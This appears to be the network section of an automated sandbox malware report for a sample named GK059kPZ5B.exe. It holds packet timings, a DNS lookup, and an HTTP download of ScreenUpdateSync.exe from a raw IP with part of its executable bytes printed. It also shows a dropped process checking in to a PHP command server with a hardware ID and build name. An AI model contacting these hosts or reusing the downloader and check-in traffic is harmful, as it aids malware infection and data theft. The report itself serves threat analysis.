                                                          Oct 26, 2024 19:08:34.613214016 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613214016 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613241911 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613257885 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613257885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613257885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613257885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613274097 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613281965 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613290071 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613305092 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613306046 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613315105 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613323927 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613338947 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613357067 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613367081 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613367081 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613367081 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613384962 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613399029 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613430977 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613430977 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613430977 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613441944 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614126921 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614151001 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614166975 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614177942 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614190102 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614200115 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614207029 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614217997 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614223003 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614238977 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614253044 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614259958 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614259958 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614274025 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614274025 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614285946 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614300966 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614321947 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614341021 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614346027 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614346027 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614346027 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614372015 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614382982 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614383936 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614382982 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614392996 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614418983 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614434004 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614449978 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614456892 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614456892 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614456892 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614471912 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614486933 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614486933 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614492893 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614509106 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614517927 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614527941 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614530087 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614547968 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614588976 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614590883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614590883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614590883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614603996 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614628077 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614641905 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614654064 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614654064 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614664078 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614681959 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614685059 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614686012 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614705086 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614711046 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614727020 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614732981 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614748001 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614762068 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614778042 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614793062 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614801884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614801884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614801884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614818096 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614830017 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614830017 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614833117 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614847898 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614849091 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614865065 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614876032 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614880085 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614895105 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614917040 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614932060 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614948988 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614963055 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614976883 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614989996 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615005970 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615011930 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615011930 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615022898 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615037918 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615051985 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615071058 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615107059 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615122080 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615125895 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615143061 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615158081 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615160942 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615174055 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615200043 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615200043 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615200043 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615210056 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615214109 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615233898 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615243912 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615247965 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615271091 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615274906 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615284920 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615299940 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615319967 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615319967 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615319967 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615335941 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615355968 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615370989 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615384102 CEST8049705176.113.115.37192.168.2.5
Oct 26, 2024 19:08:34.615408897 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:08:34.615410089 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:08:34.615446091 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:08:39.303551912 CEST | 80 | 49705 | 176.113.115.37 | 192.168.2.5
Oct 26, 2024 19:08:39.306751966 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:08:39.876889944 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:39.882364035 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:39.882484913 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:39.882617950 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:39.888060093 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:40.769423008 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:40.769534111 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:40.774274111 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:40.779674053 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:41.934814930 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:41.936068058 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:47.436826944 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:47.437011003 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:47.646763086 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:47.646891117 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:08:47.858764887 CEST | 80 | 49707 | 62.204.41.177 | 192.168.2.5
Oct 26, 2024 19:08:47.858819962 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:10:05.523647070 CEST | 49707 | 80 | 192.168.2.5 | 62.204.41.177
Oct 26, 2024 19:10:21.434583902 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:10:21.748120070 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:10:22.355070114 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:10:23.558217049 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:10:25.964453936 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:10:30.776933908 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Oct 26, 2024 19:10:40.386378050 CEST | 49705 | 80 | 192.168.2.5 | 176.113.115.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2024 19:08:31.466759920 CEST | 52285 | 53 | 192.168.2.5 | 1.1.1.1
Oct 26, 2024 19:08:31.476715088 CEST | 53 | 52285 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 26, 2024 19:08:31.466759920 CEST | 192.168.2.5 | 1.1.1.1 | 0xf8fe | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 26, 2024 19:08:31.476715088 CEST | 1.1.1.1 | 192.168.2.5 | 0xf8fe | No error (0) | post-to-me.com | | 172.67.179.207 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 19:08:31.476715088 CEST | 1.1.1.1 | 192.168.2.5 | 0xf8fe | No error (0) | post-to-me.com | | 104.21.56.70 | A (IP address) | IN (0x0001) | false
                                                          • post-to-me.com
                                                          • 176.113.115.37
                                                          • 62.204.41.177
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 176.113.115.37 | 80 | 7092 | C:\Users\user\Desktop\GK059kPZ5B.exe

Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 19:08:32.802376986 CEST | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
                                                          User-Agent: ShareScreen
                                                          Host: 176.113.115.37
Oct 26, 2024 19:08:33.704457045 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:33 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Last-Modified: Sat, 26 Oct 2024 17:00:01 GMT
                                                          ETag: "62400-625642a987083"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 402432
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b fa 88 0b 0f 9b e6 58 0f 9b e6 58 0f 9b e6 58 b2 d4 70 58 0e 9b e6 58 11 c9 62 58 11 9b e6 58 11 c9 73 58 1b 9b e6 58 11 c9 65 58 64 9b e6 58 28 5d 9d 58 0a 9b e6 58 0f 9b e7 58 74 9b e6 58 11 c9 6c 58 0e 9b e6 58 11 c9 72 58 0e 9b e6 58 11 c9 77 58 0e 9b e6 58 52 69 63 68 0f 9b e6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bd b3 2f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 03 00 00 38 10 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 5b 38 06 00 02 00 00 81 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KXXXpXXbXXsXXeXdX(]XXXtXlXXrXXwXXRichXPEL/f8@&[8<.text `.rdata%&@@.dataxL@.rsrc@@
                                                          Oct 26, 2024 19:08:33.704480886 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 f0 43 00 75 02 f3 c3 e9 e5 06 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 5c 08 00 00 8b
                                                          Data Ascii: ;CuUQeVEPuu\u9EttM^jh Ceu;5dQw"jYeVYEEEjYUVuSW=C=DuYj
                                                          Oct 26, 2024 19:08:33.704499960 CEST1236INData Raw: ff ff ff 33 c0 85 f6 0f 95 c0 33 ff 47 50 8b 45 f0 56 57 53 6a 09 ff 70 04 ff 15 d8 c0 43 00 85 c0 0f 84 34 ff ff ff 8b 45 08 85 c0 0f 84 cb fe ff ff 89 38 e9 c4 fe ff ff 8b 45 08 3b c1 74 02 89 08 33 c0 5f c9 c3 8b ff 55 8b ec 51 83 4d fc ff 8b
                                                          Data Ascii: 33GPEVWSjpC4E8E;t3_UQMES]Vtu`Dujuu`DjjC3MQE^[U=lDuuhXYY]jXh`C3uEPCj_}MZf9@u8<@
                                                          Oct 26, 2024 19:08:33.704513073 CEST1236INData Raw: 0c 6a 04 e8 bd 00 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8 bb 0c 00 00 c3 8b ff 56 57 33 f6 bf 98 09 44 00 83 3c f5 84 f1 43 00 01 75 1e 8d 04 f5 80 f1 43 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 e8 29 33 00 00 59 59
                                                          Data Ascii: jY;uE;tVW3D<CuC8h0)3YYtF$|3@_^$C3SCVCW>t~tWWF3&YC|C_t~uPC|^[UE4CC]jhC3G}39
                                                          Oct 26, 2024 19:08:33.704524040 CEST1236INData Raw: 8d 4c 11 ec 51 8d 48 14 51 50 e8 8d 2f 00 00 8b 45 08 83 c4 0c ff 0d 5c a9 51 00 3b 05 e8 0a 44 00 76 04 83 6d 08 14 a1 60 a9 51 00 a3 68 a9 51 00 8b 45 08 a3 e8 0a 44 00 89 3d 70 a9 51 00 5b 5f 5e c9 c3 a1 6c a9 51 00 56 8b 35 5c a9 51 00 57 33
                                                          Data Ascii: LQHQP/E\Q;Dvm`QhQED=pQ[_^lQV5\QW3;u4kP5`QW5DC;u3xlQ5\Q`Qk5`QhAj5DCF;tjh hWCF;uvW5DCN>~\QF_^
                                                          Oct 26, 2024 19:08:33.704535007 CEST1236INData Raw: fc 33 c0 40 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 a1 5c a9 51 00 8b 4d 08 6b c0 14 03 05 60 a9 51 00 83 c1 17 83 e1 f0 89 4d f0 c1 f9 04 53 49 83 f9 20 56 57 7d 0b 83 ce ff d3 ee 83 4d f8 ff eb 0d 83 c1 e0 83 ca ff 33 f6 d3 ea 89 55 f8 8b 0d 68
                                                          Data Ascii: 3@_^[U\QMk`QMSI VW}M3UhQS;#U#u];r;u`QS;#U#u];r;u[{u];r;u1`Q{u];r;u]u3S:YKC8t
                                                          Oct 26, 2024 19:08:33.704555035 CEST1236INData Raw: f0 43 00 57 8b cb e8 8d 2a 00 00 e9 1c ff ff ff 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 50 c0 43 00 a3 ec 0a 44 00 85 c0 75 02 5d c3 33 c0 40 a3 54 a9 51 00 5d c3 8b ff 55 8b ec 57 bf e8 03 00 00 57 ff 15 10 c1 43 00
                                                          Data Ascii: CW*U39EjhPPCDu]3@TQ]UWWCu8C`wt_]Uu5Ch]UhC8CthCPCtu]UuYuCj@Yj]YU
                                                          Oct 26, 2024 19:08:33.704570055 CEST1236INData Raw: 83 c4 14 68 10 20 01 00 68 88 c7 43 00 57 e8 b5 29 00 00 83 c4 0c eb 32 6a f4 ff 15 7c c0 43 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac f2 43 00 ff 36 e8 21 2c 00 00 59 50 ff 36 53 ff 15 18 c1 43 00 5f 5e 5b c9 c3 6a 03 e8
                                                          Data Ascii: h hCW)2j|C;t$tjEP4C6!,YP6SC_^[j,Ytj,Yu=Cuh)hYYUE<D]U5<DYtuYt3@]3]UVWuM#Eu3;t0;u,WWWWW
                                                          Oct 26, 2024 19:08:33.704581022 CEST1236INData Raw: 75 e4 ff d3 89 86 fc 01 00 00 89 7e 70 c6 86 c8 00 00 00 43 c6 86 4b 01 00 00 43 c7 46 68 68 f3 43 00 6a 0d e8 52 e9 ff ff 59 83 65 fc 00 ff 76 68 ff 15 18 c0 43 00 c7 45 fc fe ff ff ff e8 3e 00 00 00 6a 0c e8 31 e9 ff ff 59 89 7d fc 8b 45 0c 89
                                                          Data Ascii: u~pCKCFhhCjRYevhCE>j1Y}EFlupCFlvl(YE?3GujYjYVW4C5`CuNhjiYYt:V5`C5LDYtjVYY0CN
                                                          Oct 26, 2024 19:08:33.704592943 CEST1236INData Raw: 3b df 0f 95 c0 3b c7 75 1d e8 b6 e1 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 fc 0b 00 00 83 c4 14 83 c8 ff eb 53 83 3d 54 a9 51 00 03 75 38 6a 04 e8 71 e4 ff ff 59 89 7d fc 53 e8 9a e4 ff ff 59 89 45 e0 3b c7 74 0b 8b 73 fc 83 ee 09 89 75 e4 eb
                                                          Data Ascii: ;;uWWWWWS=TQu8jqY}SYE;tsuuE%9}uSW5D<Cg3]uj?Y-t"ttHt3VWh3FWP"3~~~~h
                                                          Oct 26, 2024 19:08:33.710000038 CEST1236INData Raw: e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45 e0 8a 80 94 f7 43 00 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 46 46 80 3e 00 75 d1 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 67
                                                          Data Ascii: *Ft(>ECD;FG;v}FF>uuE}ur{CgjCCCZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95XDXM_^3[jhxC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 62.204.41.177 | 80 | 3640 | C:\Users\user\AppData\Local\Temp\A865.tmp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 19:08:39.882617950 CEST | 88 | OUT | GET / HTTP/1.1
                                                          Host: 62.204.41.177
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
Oct 26, 2024 19:08:40.769423008 CEST | 203 | IN | HTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:40 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 0
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
Oct 26, 2024 19:08:40.774274111 CEST | 419 | OUT | POST /edd20096ecef326d.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH
                                                          Host: 62.204.41.177
                                                          Content-Length: 219
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 38 33 42 42 30 34 31 46 44 42 32 34 39 36 36 31 38 36 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 2d 2d 0d 0a
                                                          Data Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="hwid"B683BB041FDB2496618675------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build"default9_cap------DAFHIDGIJKJKECBGDBGH--
Oct 26, 2024 19:08:41.934814930 CEST | 210 | IN | HTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:40 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 8
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                                          Data Ascii: YmxvY2s=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 172.67.179.207 | 443 | 7092 | C:\Users\user\Desktop\GK059kPZ5B.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-26 17:08:32 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
